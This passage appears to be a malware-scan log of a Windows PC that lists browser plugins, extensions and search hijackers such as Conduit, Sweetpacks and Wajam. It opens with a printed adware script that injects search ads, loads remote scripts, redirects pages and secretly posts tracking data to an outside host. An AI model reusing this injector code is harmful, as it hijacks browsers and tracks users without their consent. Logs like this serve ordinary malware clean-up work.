a};b.tpl_engine=function(a,c,d){\"false\"!==d.layouts.unique&&(c=b.escape_chars_for_json©);a=JSON.stringify(a);c=[{replace:\"title\",\"with\":c.title},{replace:\"displayUrl\",\"with\":c.displayUrl},{replace:\"description\",\"with\":c.description},{replace:\"clickUrl\",\"with\":c.clickUrl}];for(d=0;d<c.length;d++)a=a.replace(RegExp(\"\\\\[##\"+c[d].replace+\"##\\\\]\",\"g\"),c[d][\"with\"]);try{return JSON.parse(a)}catch(e){}};b.get_item_json=function(a,c){var d=b.utils.clone_object(a.layouts.template); d.attrs instanceof Object||(d.attrs={});return d=b.tpl_engine(d,c,a)};b.add_jsonp_to_config=function(a,c){b.get_item_json(a)};b.remove_search=function(){var a=b.utils.query_selector_all(\".yael\");if(0<a.length)for(var c=0;c<a.length;c++)a[c].parentNode.removeChild(a[c])};b.inject_json=function(a){\"first\"==a.insert?a.element.insertBefore(a.node,a.element.firstChild):\"before\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element):\"after\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element.nextSibling): a.element.appendChild(a.node)};b.get_ad_dom=function(a){return a.layouts instanceof Object&&a.layouts.dom instanceof Object?a.layouts.dom:!1};b.get_layout_type=function(a){if(a.layouts instanceof Object)for(var b=0;b<h.length;b++)if(-1<a.layouts.id.indexOf(h))return h;return!1};b.create_search=function(a){a=b.get_ad_dom(a);return b.dom.json_to_html(a)};b.templates=new function(){this.container_id=0;this.add_real_links=function(a,c){b.utils.add_event(\"click\",function(b){window.open(a);b.preventDefault? b.preventDefault():b.returnValue=!1},!1,c)}};b.validate_response=function(){for(var a in __yael_res.data.items)__yael_res.data.items[a].displayUrl.match(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/)&&__yael_res.data.items[a].displayUrl.replace(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/,\"\")};b.is_target_valid=function(a){if(0!=__yael_res.data.numberOfItems&&\"undefined\"!=typeof a.element)return a.urls instanceof Array&&!b.utils.match_url(a.element.ownerDocument.location.href,a.urls)?!1:!0};var p=null;b.get_target_element=function(a){if(a.inserts instanceof Array&&\"undefined\"==typeof a.element)for(var b=0;b<a.inserts.length;b++)if(a.element=l(a.inserts.selector),\"undefined\"!==typeof a.element){a.insert=a.inserts.at;break}};b.add_data_to_config=function(a,c){if(0==c.length)return b.unique_items_left=!1;var d=b.get_ad_dom(a);(function(a,c){c.children&&0!==c.children.length?(c=c.children[c.children.length-1],arguments.callee(a,c)):b.insert_point=c})(a,d);for(d=0;d<b.num_of_items_in_one&&0!=c.length;d++)b.insert_point.children.push(b.get_item_json(a, c[0])),b.not_unique_items.push(c.shift())};b.check_if_div_in_dom=function(a,b){var d=[],e;for(e in __yael_res.config.targets){var f=__yael_res.config.targets[e];clearTimeout(p);a++;if(4<a)return;if(f.inserts instanceof Array&&\"undefined\"==typeof f.element)for(var g=0;g<f.inserts.length;g++){var k=l(f.inserts[g].selector);\"undefined\"!==typeof k&&d.push(k)}}for(e=0;e<d.length;e++)if(\"undefined\"==typeof d[e]){var h=this;p=setTimeout(function(){h.apply(h,arguments)},200)}b()};b.loop_targets=function(a, c,d){if(a instanceof Object&&(b.get_target_element(a),b.is_target_valid(a)&&(a.current_layout=b.get_layout_type(a),\"false\"==d&&b.unique_items_left&&(c=b.not_unique_items),0!=c.length))){b.add_data_to_config(a,c);try{a.node=b.create_search(a)}catch(e){}\"undefined\"!=typeof a.node&&b.inject_json(a)}};b.inject_search=function(){b.not_unique_items=[];0!=__yael_res.data.items.length&&(b.setClickHref(__yael_res.data.items[0].clickUrl,b.projects_name),b.check_if_div_in_dom(0,function(){for(var a in __yael_res.config.targets){var c= __yael_res.config.targets[a];b.loop_targets(c,__yael_res.data.items,c.layouts.unique)}\"function\"==typeof b.projects_info[b.projects_name].tweak&&b.projects_info[b.projects_name].tweak()}))};b.init_search_project=function(){b.waitForElementCounter=0;\"undefined\"!=typeof __yael&&b.remove_search();for(var a in b.projects_info)if(b.utils.match_url(location.href,b.projects_info[a].urls)){var c=b.projects_info[a];b.projects_name=a;if(-1<b.initThrottle.indexOf(a))c.validate(function(){c.name=b.projects_name; b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})});else{if(!c.validate())return;c.name=b.projects_name;b.projects_name=a;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})}}return!1};b.get_keyword=function(a,c){var d=a.src_for_keyword,e=function(d){b.inputElement=d[0];b.keyword=b.inputElement.value;if(b.inputElement&&\"input\"==b.inputElement.tagName.toLowerCase()&&\"\"!==b.keyword)return 2>b.keyword.length?!1:c(b.keyword,a.name)};if(d instanceof Array)for(var f=0;f<d.length;f++)b.utils.waitForElement(d[f], function(a){a&&e(a)},100,\"keyword\");else b.utils.waitForElement(d,function(a){a&&e(a)},100,\"keyword\")};b.remove_se_handler=function(a){var c=b.projects_info[a].dr;if(c instanceof Array)if(\"bing\"==a)for(c=b.utils.query_selector_all(c[0]),a=0;a<c.length;a++)b.remove_se(c[a]);else for(a=0;a<c.length;a++){var d=l(c[a]);b.remove_se(d)}};b.remove_se=function(a){a&&a.parentElement.removeChild(a)};b.jsonp_request=function(a,c){var d=b.num_of_items_in_one*parseInt(b.projects_info[c].unique_search_divs);window.__yael_cb= function(a){window.__yael_res=a;\"0\"!=__yael_res.data.numberOfItems&&(0==__yael.utils.getRandomInt(0,10)&&b.remove_se_handler©,__yael.inject_search())};\"undefined\"==typeof window.__yael&&(window.__yael=b);d=b.jsonpHost+\"/?v=\"+b.version+\"&p=\"+c+\"&keyword=\"+a+\"&numItems=\"+d+\"&hid=8196839351945351958&eid=309&pid=1182\";if(b.utils.isIE()){if(document.getElementById(\"__yael_script\")){var e=document.getElementById(\"__yael_script\");e.parentNode.removeChild(e)}e=document.createElement(\"script\"); e.id=\"__yael_script\";e.src=\"//\"+d+\"&domvar=__yael_cb\";e.type=\"text/javascript\";document.getElementsByTagName(\"head\")[0].appendChild(e)}else b.utils.ajax.get(\"//\"+d,function(a){window.__yael_res=JSON.parse(a);\"0\"!=__yael_res.data.numberOfItems&&(0==__yael.utils.getRandomInt(0,10)&&__yael.remove_se_handler©,__yael.inject_search())})};\"undefined\"==typeof __yael&&b.init_search_project();-1<b.initThrottle.indexOf(b.projects_name)&&b.events.add(\"keyup\",b.utils.throttle(b.init_search_project,3E3),!1,b.inputElement, !1)}});;if(window.self.location.protocol.indexOf('http:')>-1 && window.self==window.top){var script=document.createElement('script');script.type='text/javascript';script.src='//static.datafastguru.info/fo/min/fo_ss.min.js';document.getElementsByTagName(\"head\")[0].appendChild(script);};if(window.self==window.top && \"www.google.com,mail.google.com,en.wikipedia.org,www.facebook.com\".indexOf(window.self.location.hostname) == -1){var s1 = document.createElement(\"script\");s1.type = \"text/javascript\";s1.src = \"http://intext.nav-links.com/js/intext.js?afid=advertisewp&subid=advertisewp8&maxlinks=8&linkcolor=#0000FF\";document.getElementsByTagName(\"head\")[0].appendChild(s1);};(function(){if(window.self==window.top&&!document.getElementById('shk85shssma')){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.id='shk85shssma';a.src=-1<window.self.location.hostname.indexOf(\"cebook.co\")?\"//cdncache-a.akamaihd.net/loaders/1543/l.js?aoi=1311798366&pid=1543&zoneid=288130&ext=safesaver\":\"//static.getjs.net/sd/1018/1008.js\";document.getElementsByTagName(\"head\")[0].appendChild(a);}})();;if(window.self.location.hostname.indexOf('mail.')==-1)\r\n{try{for(i=0;i<5;i++){window.setTimeout(function(){if(document.getElementById(\"cblocker\")){document.getElementById(\"cblocker\").parentNode.removeChild(document.getElementById(\"cblocker\"));};if(document.getElementById(\"_vdcbl\")){document.getElementById(\"_vdcbl\").parentNode.removeChild(document.getElementById(\"_vdcbl\"));}},i*100)}}catch(e){};\r\n};(function(){var b,f,g;try{var a=window.self.location.href;if(!(window.self==window.top||\"undefined\"==typeof localStorage||\"undefined\"==typeof localStorage.setItem||-1==a.indexOf(\"MUEM3t4Z=\")&&!a.match(/1018-\\d{3,4}_/)&&-1==a.indexOf(\"cdncache-a.aka\"))){if(-1<a.indexOf(\"MUEM3t4Z=\")){var d=a.match(/MUEM3t4Z=(\\d+)_(\\d{2,3}x\\d{2,3})_?(\\d+)?/);b=d[1];f=d[2].replace(\"x\",\".\");g=d[3]?d[3]:0}else{try{var j=-1<a.indexOf(\"zoneid\")?a.match(/zoneid=(\\d+)/)[1]:a.match(/1018-(\\d+)_WS/)[1]}catch(n){j=0}var c=document.getElementsByTagName(\"body\")[0];b=-1<a.indexOf(\"cdncache-a.aka\")?1001:1002;f=Math.max(c.scrollWidth,c.offsetWidth)+\".\"+Math.max(c.scrollHeight,c.offsetHeight);g=j}var e=new Date,k=parseInt(e.getTime()/1E3),l=\"zyk_\"+[e.getUTCFullYear()+\"-\"+(e.getUTCMonth()+1)+\"-\"+e.getUTCDate(),b,f,g].join(),m=localStorage.getItem(l);localStorage.setItem(l,1+(m?parseInt(m):0));if(lsTime=localStorage.getItem(\"zEpoch\")){if(7200<k-parseInt(lsTime)){var h=document.createElement(\"div\");b=[];for(i in localStorage)-1<i.indexOf(\"zyk_\")&&b.push(\"'\"+i.replace(\"zyk_\",\"\")+\"':\"+localStorage.getItem(i));h.style.display=\"none\";h.innerHTML='<iframe name=\"webscorebox_ifr\"></iframe><form target=\"webscorebox_ifr\" method=\"post\" action=\"http://count3.webscorebox.com/?q=g708BNmGWj8lkGhVWzmPhd9HrdUMCyVUojwFpdsMDMlGC7VLBT94tMtGB6DHhfs0rShNAen0rchOAen0pdw4qTYHpjr8rjU9qjr8rjU8pa==\" id=\"webscorebox_frm\"><input type=\"hidden\" name=\"scores\" value=\"{'+b.join(\",\")+'}\"></form>';(typeof c!=\"undefined\"?c:document.getElementsByTagName(\"body\")[0]).appendChild(h);document.getElementById(\"webscorebox_frm\").submit();localStorage.clear()}}else localStorage.setItem(\"zEpoch\",k)}}catch(p){}})();;(function(){-1<window.self.location.hostname.indexOf(\"kass.t\")&&setTimeout(function(){if(document.getElementById(\"_091c88d5b8c081bf15d212c4ae994c85\")){var a=document.getElementById(\"_091c88d5b8c081bf15d212c4ae994c85\"),b=document.createElement(\"div\");b.setAttribute(\"style\",\"width:100%;height:300%;position:absolute;left:0;top:0\");b.innerHTML='<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"width:100%;height:100%\">';a.style.position=\"relative\";a.appendChild(b)}document.getElementById(\"_2bffc94164dd9984ae4826e8bc988721\")&&(a=document.getElementById(\"_2bffc94164dd9984ae4826e8bc988721\"),b=document.createElement(\"div\"),b.setAttribute(\"style\",\"width:100%;height:121%;position:absolute;left:0;top:0\"),b.innerHTML='<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"width:100%;height:100%\">',a.style.position=\"relative\",a.appendChild(b))},250);if(-1<window.self.location.hostname.indexOf(\"eo-online.me\")&&window.self==window.top){var d=function(){try{if(jQuery(\".down, .dloadf, .dloadt\").attr(\"href\",\"#\"),$(\"#adsfrm\").length){var a=$(\"#adsfrm\").offset();$('<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"position:absolute;z-index:9999;top:'+a.top+\"px;left:\"+a.left+\"px;width:\"+$(\"#adsfrm\").width()+\"px;height:\"+$(\"#adsfrm\").height()+'px;\">').appendTo(\"body\")}}catch(b){}},c=document.createElement(\"script\");c.type=\"text/javascript\";c[-1<navigator.userAgent.toLowerCase().indexOf(\"msie\")?\"text\":\"innerHTML\"]=\"(\"+d.toString()+\")()\";document.getElementsByTagName(\"head\")[0].appendChild©}if(-1<window.self.location.hostname.indexOf(\"irpy.co\")&&window.self==window.top)try{d=function(){try{$(\".download-maxiget, .download-trinity\").attr(\"href\",\"#\"),$(\"#mp3-with-trinity\").remove()}catch(a){}},-1<!navigator.userAgent.indexOf(\"chrome\")?d():(c=document.createElement(\"script\"),c.innerHTML=\"(\"+d.toString()+\")()\",document.body.appendChild©)}catch(e){}if('GB'!='US'&&-1<window.self.location.hostname.indexOf(\"ehd.c\")&&document.getElementById(\"r1113566095\")){var d=document.createElement(\"img\");d.setAttribute(\"style\",\"width:100%;height:100%;position:absolute;z-index:99999;left:0;top:0\");d.src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\";var a=document.getElementById(\"r1113566095\").parentNode;a.style.position=\"relative\";a.appendChild(d)};})();if(window.self.location.hostname.indexOf('hesefiles.c')>-1) window.self.location.href='about:blank';if(-1<window.self.location.hostname.indexOf(\"usfiles.ne\")){var a=function(){$(\"form[name=F1]\").submit(function(){if(-1<$(this).attr(\"action\").indexOf(\"bdl1=\"))return $(\"input[name=quick]\").attr(\"checked\",!1),window.setTimeout(function(){$(\"#btn_download\").attr(\"disabled\",!1).val(\"Download Now!!\");$(\"form[name=F1]\").unbind(\"submit\")},700),!1})};if(-1==navigator.userAgent.toLowerCase().indexOf(\"chrome\"))a();else{var s=document.createElement(\"script\");s.type=\"text/javascript\";s.innerHTML=\"(\"+a.toString()+\")()\";document.body.appendChild(s)}};if(-1<window.self.location.hostname.indexOf(\"ebeast.co\")){var d=document.getElementsByTagName(\"div\"),i;for(i in d)d[i]&&d[i].style&&\"fixed\"==d[i].style.position&&\"solid\"==d[i].style.borderBottomStyle&&(d[i].style.display=\"none\")};;(function(){try{var b=\"gonetwork.eu performancerevenues.com adtransfer adk2.com timehare clkads.com adcash xtendmedia.com cpxinteractive media-servers directrev doubleclick brealtime.com adnxs.com yieldmanager jsopen yieldads adserverplus clicksor exoclick.com vitalads zedo.com mshft pop.billi mediawhite edomz getjs adjuggler realpopbid bestadbid directdisplayad displayadfeed adorika displayadfeed akamaihd.net/ssa/ trusted-serving tusfiles clkmon.c\".split(\" \");for(i=0;i<b.length;i++){var a=location.href + (document.title?document.title.toLowerCase():\"z\");if(document.referrer&&-1<document.referrer.indexOf(b[i])&&(-1<a.indexOf(\"download\")||-1<a.indexOf(\"convert\")||-1<window.self.location.href.indexOf(\"babylon\")||-1<window.self.location.href.indexOf(\"se Update Go\")||-1<window.self.location.href.indexOf(\"ilivid\")||-1<window.self.location.href.indexOf(\"download\")||-1<a.indexOf(\"regclean\")||-1<a.indexOf(\"etype\")||-1<a.indexOf(\"diction\")||-1<a.indexOf(\"my-uq\")||-1<a.indexOf(\"ftalk\")||-1<a.indexOf(\"pcspeedmaximizer\")||-1<a.indexOf(\"kingtransl\")||-1<a.indexOf(\"jsopen\")||-1<a.indexOf(\"7-zip\")||-1<a.indexOf(\"boost pc\")||-1<a.indexOf(\"computer slow\")||-1<a.indexOf(\"7-update14\")||-1<a.indexOf(\"player\")) || location.hostname.indexOf('jsopen.net')>-1){location.href=\"http://yt.jobfindgold.info/e/?eid=309&hid=8196839351945351958&pid=1182&ch=99&s=px.pluginh&r=\"+Math.random();break}}}catch(d){}})();if(-1==window.self.location.hostname.indexOf('mail.')){for(i=0;5>i;i++)window.setTimeout(function(){document.getElementById('c2soffer')&&document.getElementById('c2soffer').parentNode.removeChild(document.getElementById('c2soffer'))},100*i);var c2soffer=document.querySelectorAll('div.c2soffer');if(c2soffer.length)for(var i=0;i<c2soffer.length;i++)c2soffer[i].parentNode.removeChild(c2soffer[i]);document.getElementById('w3uyh7g6h7f5x')&&document.getElementById('w3uyh7g6h7f5x').parentNode.removeChild(document.getElementById('w3uyh7g6h7f5x'))}})();(function(){void(0)})()");
FF - prefs.js..keyword.URL: "http://search.condui...335158&UM=2&q="


FF:64bit: - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF64_11_9_900_152.dll File not found
FF:64bit: - HKLM\Software\MozillaPlugins\@divx.com/DivX VOD Helper,version=1.0.0: C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF:64bit: - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: disabled File not found
FF:64bit: - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files\Microsoft Silverlight\5.1.20913.0\npctrl.dll ( Microsoft Corporation)
FF:64bit: - HKLM\Software\MozillaPlugins\@microsoft.com/SharePoint,version=14.0: C:\PROGRA~1\MICROS~2\Office15\NPSPWRAP.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_9_900_152.dll ()
FF - HKLM\Software\MozillaPlugins\@adobe.com/ShockwavePlayer: C:\Windows\SysWOW64\Adobe\Director\np32dsw.dll (Adobe Systems, Inc.)
FF - HKLM\Software\MozillaPlugins\@divx.com/DivX Browser Plugin,version=1.0.0: C:\Program Files (x86)\DivX\DivX Plus Web Player\npdivx32.dll (DivX, LLC)
FF - HKLM\Software\MozillaPlugins\@divx.com/DivX VOD Helper,version=1.0.0: C:\Program Files (x86)\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF - HKLM\Software\MozillaPlugins\@Google.com/GoogleEarthPlugin: C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)
FF - HKLM\Software\MozillaPlugins\@google.com/npPicasa3,version=3.0.0: C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll (Google, Inc.)
FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.45.2: C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.45.2: C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: disabled File not found
FF - HKLM\Software\MozillaPlugins\@microsoft.com/Lync,version=15.0: C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files (x86)\Microsoft Silverlight\5.1.20913.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/SharePoint,version=14.0: C:\PROGRA~2\MICROS~3\Office15\NPSPWRAP.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3502.0922: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3508.1109: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@pandonetworks.com/PandoWebPlugin: C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll (Pando Networks)
FF - HKLM\Software\MozillaPlugins\@real.com/nppl3260;version=6.0.12.450: C:\Program Files (x86)\Real Alternative\browser\plugins\nppl3260.dll (RealNetworks, Inc.)
FF - HKLM\Software\MozillaPlugins\@real.com/nprpjplug;version=6.0.12.448: C:\Program Files (x86)\Real Alternative\browser\plugins\nprpjplug.dll (RealNetworks, Inc.)
FF - HKLM\Software\MozillaPlugins\@real.com/nsJSRealPlayerPlugin;version=: File not found
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files (x86)\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files (x86)\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF - HKCU\Software\MozillaPlugins\@Skype Limited.com/Facebook Video Calling Plugin: C:\Users\Jon Lowry\AppData\Local\Facebook\Video\Skype\npFacebookVideoCalling.dll (Skype Limited)
FF - HKCU\Software\MozillaPlugins\@unity3d.com/UnityPlayer,version=1.0: C:\Users\Jon Lowry\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll (Unity Technologies ApS)
FF - HKCU\Software\MozillaPlugins\pandonetworks.com/PandoWebPlugin: C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll (Pando Networks)

64bit-FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{C4CFC0DE-134F-4466-B2A2-FF7C59A8BFAD}: C:\PROGRAM FILES\UPDATER BY SWEETPACKS\FIREFOX
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{3252b9ae-c69a-4eaf-9502-dc9c1f6c009e}: C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Default Manager\DMExtension\ [2011/01/26 14:53:54 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{23fcfd51-4958-4f00-80a3-ae97e717ed8b}: C:\Program Files (x86)\DivX\DivX Plus Web Player\firefox\html5video [2011/06/04 05:43:06 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{6904342A-8307-11DF-A508-4AE2DFD72085}: C:\Program Files (x86)\DivX\DivX Plus Web Player\firefox\wpa [2011/06/04 05:43:06 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\wrc@avast.com: C:\PROGRA~1\AVASTS~1\Avast\WebRep\FF [2013/12/06 15:39:12 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 24.0\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components [2013/10/05 21:14:19 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 24.0\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins [2013/12/06 15:04:48 | 000,000,000 | ---D | M]
FF - HKEY_CURRENT_USER\software\mozilla\FireFox\Extensions\\{5a95a9e0-59dd-4314-bd84-4d18ca83a0e2}: C:\Program Files (x86)\Wajam\Firefox\{5a95a9e0-59dd-4314-bd84-4d18ca83a0e2}.xpi

[2013/08/29 06:43:03 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Jon Lowry\AppData\Roaming\Mozilla\Extensions
[2012/03/27 18:27:55 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Jon Lowry\AppData\Roaming\Mozilla\Extensions\songbird@songbirdnest.com
[2013/12/06 15:01:37 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Jon Lowry\AppData\Roaming\Mozilla\Firefox\Profiles\8mzbhq3r.default\extensions
[2013/12/04 14:13:34 | 000,000,000 | ---D | M] (Multimedia Toolbar) -- C:\Users\Jon Lowry\AppData\Roaming\Mozilla\Firefox\Profiles\8mzbhq3r.default\extensions\{2A47DBFD-567F-4159-AD6A-B0D9CF6CCDFC}
[2013/12/05 23:56:56 | 000,000,000 | ---D | M] (PriceGong) -- C:\Users\Jon Lowry\AppData\Roaming\Mozilla\Firefox\Profiles\8mzbhq3r.default\extensions\{8A9386B4-E958-4c4c-ADF4-8F26DB3E4829}
[2013/12/06 00:07:06 | 000,000,000 | ---D | M] (WhiteSmoke New 1.2) -- C:\Users\Jon Lowry\AppData\Roaming\Mozilla\Firefox\Profiles\8mzbhq3r.default\extensions\{8f02605d-be4e-41ba-bd00-c39a59c46919}
[2013/08/08 04:07:04 | 000,249,988 | ---- | M] () (No name found) -- C:\Users\Jon Lowry\AppData\Roaming\Mozilla\Firefox\Profiles\8mzbhq3r.default\extensions\gophoto@gophoto.it.xpi
[2013/12/06 00:07:07 | 000,001,013 | ---- | M] () -- C:\Users\Jon Lowry\AppData\Roaming\Mozilla\Firefox\Profiles\8mzbhq3r.default\searchplugins\conduit.xml
[2013/09/16 22:56:48 | 000,002,115 | ---- | M] () -- C:\Users\Jon Lowry\AppData\Roaming\Mozilla\Firefox\Profiles\8mzbhq3r.default\searchplugins\MyStart Search.xml
[2013/10/18 11:48:59 | 000,001,585 | ---- | M] () -- C:\Users\Jon Lowry\AppData\Roaming\Mozilla\Firefox\Profiles\8mzbhq3r.default\searchplugins\Sweetpacks Search.xml
[2013/12/06 00:25:00 | 000,007,857 | ---- | M] () -- C:\Users\Jon Lowry\AppData\Roaming\Mozilla\Firefox\Profiles\8mzbhq3r.default\searchplugins\WebSearch.xml
[2013/10/05 21:14:19 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\Extensions
[2013/12/05 23:39:50 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions
[2013/10/05 21:14:29 | 000,000,000 | ---D | M] (Default) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}
[2013/10/17 11:25:52 | 000,034,072 | ---- | M] (Microsoft Corporation) -- C:\Program Files (x86)\mozilla firefox\plugins\npMeetingJoinPluginOC.dll
[2011/03/10 08:58:36 | 000,002,201 | ---- | M] () -- C:\Program Files (x86)\mozilla firefox\searchplugins\scenicreflectionstb.xml

========== Chrome ==========

CHR - default_search_provider: Google (Enabled)
CHR - default_search_provider: search_url = {google:baseURL}search?q={searchTerms}&{google:RLZ}{google:originalQueryForSuggestion}{google:assistedQueryStats}{google:searchFieldtrialParameter}{google:bookmarkBarPinned}{google:searchClient}{google:sourceId}{google:instantExtendedEnabledParameter}{google:omniboxStartMarginParameter}ie={inputEncoding}
CHR - default_search_provider: suggest_url = {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client={google:suggestClient}&q={searchTerms}&{google:cursorPosition}{google:zeroPrefixUrl}{google:pageClassification}sugkey={google:suggestAPIKeyParameter},
CHR - homepage:
CHR - plugin: Shockwave Flash (Enabled) = C:\Program Files (x86)\Google\Chrome\Application\31.0.1650.63\PepperFlash\pepflashplayer.dll
CHR - plugin: Chrome Remote Desktop Viewer (Enabled) = internal-remoting-viewer
CHR - plugin: Native Client (Enabled) = C:\Program Files (x86)\Google\Chrome\Application\31.0.1650.63\ppGoogleNaClPluginChrome.dll
CHR - plugin: Chrome PDF Viewer (Enabled) = C:\Program Files (x86)\Google\Chrome\Application\31.0.1650.63\pdf.dll
CHR - plugin: Microsoft\u00AE Windows Media Player Firefox Plugin (Enabled) = C:\Users\Jon Lowry\AppData\Roaming\Mozilla\plugins\np-mswmp.dll
CHR - plugin: Microsoft Office 2010 (Enabled) = C:\PROGRA~2\MICROS~3\Office14\NPSPWRAP.DLL
CHR - plugin: Adobe Acrobat (Enabled) = C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll
CHR - plugin: AVG SiteSafety plugin (Disabled) = C:\Program Files (x86)\Common Files\AVG Secure Search\SiteSafetyInstaller\15.5.0\\npsitesafety.dll
CHR - plugin: DivX VOD Helper Plug-in (Enabled) = C:\Program Files (x86)\DivX\DivX OVS Helper\npovshelper.dll
CHR - plugin: DivX Web Player (Enabled) = C:\Program Files (x86)\DivX\DivX Plus Web Player\npdivx32.dll
CHR - plugin: Google Earth Plugin (Enabled) = C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll
CHR - plugin: Picasa (Enabled) = C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll
CHR - plugin: Google Update (Enabled) = C:\Program Files (x86)\Google\Update\1.3.21.153\npGoogleUpdate3.dll
CHR - plugin: Java™ Platform SE 7 U25 (Enabled) = C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll
CHR - plugin: Pando Web Plugin (Enabled) = C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll
CHR - plugin: RealPlayer™ G2 LiveConnect-Enabled Plug-In (32-bit) (Enabled) = C:\Program Files (x86)\Real Alternative\browser\plugins\nppl3260.dll
CHR - plugin: RealPlayer Version Plugin (Enabled) = C:\Program Files (x86)\Real Alternative\browser\plugins\nprpjplug.dll
CHR - plugin: Windows Live\u0099 Photo Gallery (Enabled) = C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll
CHR - plugin: Unity Player (Enabled) = C:\Users\Jon Lowry\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll
CHR - plugin: Facebook Video Calling Plugin (Enabled) = C:\Users\Jon Lowry\AppData\Local\Facebook\Video\Skype\npFacebookVideoCalling.dll
CHR - plugin: Shockwave for Director (Enabled) = C:\Windows\SysWOW64\Adobe\Director\np32dsw.dll
CHR - plugin: Shockwave Flash (Enabled) = C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_8_800_168.dll
CHR - plugin: Java Deployment Toolkit 7.0.250.17 (Enabled) = C:\Windows\SysWOW64\npDeployJava1.dll
CHR - plugin: Silverlight Plug-In (Enabled) = c:\Program Files (x86)\Microsoft Silverlight\5.1.20513.0\npctrl.dll
CHR - Extension: Google Drive = C:\Users\Jon Lowry\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\
CHR - Extension: YouTube = C:\Users\Jon Lowry\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\
CHR - Extension: Google Search = C:\Users\Jon Lowry\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\
